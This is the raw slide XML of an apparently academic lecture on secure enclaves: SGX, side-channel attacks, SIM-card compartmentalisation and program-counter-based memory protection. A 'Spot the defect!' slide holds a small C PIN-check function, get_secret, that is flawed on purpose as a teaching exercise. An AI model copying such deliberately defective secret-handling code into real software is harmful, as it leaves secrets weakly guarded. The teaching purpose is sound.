              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> program,                                but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>also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from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the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underlying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Operating System!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hence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example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use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>don’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> trust:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> provider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cannot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read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your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data or reverse-engineer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DRM (Digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rights</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Management): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>decrypting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> video content on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> device without user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to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keys</a:t>
            </a:r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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> concerns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>about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Intel’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> business model &amp; level of control:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will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only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>signed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by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>be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allowed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to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> run in enclaves?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104452" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{094F3BFC-FAC6-4B29-5F4F-770CCBFBB4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1A02CE90-ABF2-404F-ACF6-8E2009E7A2F9}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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E20B2DBC-2664-A29D-FCD1-32758BB8E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2163" y="309563"/>
            <a:ext cx="8496300" cy="1166018"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0"/>
              <a:t>The security failure of SGX </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>And other secure enclave technologies? </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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039E7-ED7C-CF35-E9EE-549F9EE97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  <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The growing list of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>micro-architectural side-channel attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Specre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Meltdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and their variants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and failure to eridate them suggest that information leakage between execution threads running on the same hardware is inevitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SGX was depreciated for Intel 11 in 2021, but development continues for Intel processors for cloud &amp; enterprise usage.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104452" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{094F3BFC-FAC6-4B29-5F4F-770CCBFBB4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1A02CE90-ABF2-404F-ACF6-8E2009E7A2F9}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>69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6903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ABC4C99-B0BD-3740-4160-EBCABA258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2400"/>
              <a:t>Compartmentalisation example: SIM card in phone</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="240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5C9FB8D1-14EA-42CC-4939-E61E59BD8B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nl-NL" altLang="en-US"/>
              <a:t>A SIM provides some trusted functionality (with a small TCB)                 to a larger untrusted application (with a larger TCB)</a:t>
            </a:r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F001C99-EB45-C766-6833-CBF11165BA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370AD8E1-995C-4C61-A957-8FD958BC5E0E}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8197" name="Picture 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D82E5995-BAC0-6BA9-E3FC-0D15123DD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3935413"/>
            <a:ext cx="16129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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F91EEDE-C0E2-08DA-621A-441AAD253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550" y="5064125"/>
            <a:ext cx="5111750" cy="520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en-US" sz="2400" b="1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main CPU</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US" sz="1600" b="1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9" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D365DD20-E4BD-9983-351A-2196A91F1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550" y="3697288"/>
            <a:ext cx="5111750" cy="1236662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en-US" sz="2400" b="1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en-US" sz="4000" b="1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OS</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US" b="1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00" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1D1516E-1D1C-99CB-8889-80EA62084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850" y="3197225"/>
            <a:ext cx="1612900" cy="611188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC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en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2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trusted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en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2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functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8201" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61846A34-C44A-84AD-F8DD-DA09EDD22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2124075"/>
            <a:ext cx="2506662" cy="1443038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC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en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx2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en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2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untrusted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en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2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application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8202" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1794BAB8-DB31-97A9-93CC-F0C22C511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3808413"/>
            <a:ext cx="10683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Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{468BA134-0A3C-2762-60C1-368B75A6AA14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2817813" y="2871788"/>
            <a:ext cx="1511300" cy="500062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
              <a:gd name="T1" fmla="*/ 0 h 4065"/>
              <a:gd name="T2" fmla="*/ 0 w 1229"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
              <a:gd name="T6" fmla="*/ 0 w 1229"/>
              <a:gd name="T7" fmla="*/ 0 h 4065"/>
              <a:gd name="T8" fmla="*/ 1229 w 1229"/>
              <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                <a:moveTo>
                  <a:pt x="1228" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="4064"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3672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4" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{038FBBDC-3D60-FF8A-9595-03AB301D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00" y="2660650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altLang="en-US">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>calls</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US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E9D8B4C6-6BFD-D016-4438-0342D6115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Execution-aware memory protection</a:t>
            </a:r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5E354-9655-FD95-5E54-BAE973201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dirty="0"/>
              <a:t> A more light-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>weight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> approach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> get secure enclaves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>access control based on the value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program counter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>,             so that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>some memory region can only be accessed by a specific part of the program code </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1984" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0" err="1"/>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0" err="1"/>
              <a:t>provides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0" err="1"/>
              <a:t>similar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0" err="1"/>
              <a:t>encapsulation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0" err="1"/>
              <a:t>boundary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0" err="1"/>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0" err="1"/>
              <a:t>process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1984" dirty="0"/>
              <a:t> as SGX</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>Eg. crypto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> made only accessible from the module with the encryption code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>The possible impact of an buffer overflow attack is the rest of the code is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>reduced</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" sz="1984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764" dirty="0"/>
              <a:t>[Google, US patent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0"/>
              <a:t>9395993 B2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1764" dirty="0"/>
              <a:t>, July 2016]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764" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0" err="1"/>
              <a:t>Koeberl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0"/>
              <a:t> et al., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1764" dirty="0"/>
              <a:t>TrustLite: A security architecture for tiny embedded devices, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" i="1" dirty="0"/>
              <a:t>European Conference on Computer Systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0"/>
              <a:t>. ACM, 2014]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:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34834E1C-49CA-8D6B-25BB-3A8F4CB05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Spot the defect!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{619E30EE-59DE-0D46-BF9A-0D3D587DEA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F119FD7E-1F9F-4C25-A589-94F6450C6810}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106500" name="Tekstvak 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6496954E-084F-8062-D932-79BA37D5A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1385888"/>
            <a:ext cx="3130550" cy="31384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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tries_left = 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;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 static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PIN = 1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;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 static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secret = 666</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" b="1">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRP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int get_secret (int pin_guess) {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  if (tries_left &gt; 0) &amp;&amp;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   ( PIN == pin_guess) {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     tries_left = 3; return secret; } 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   else {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     tries_left--; return 0 ;}  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
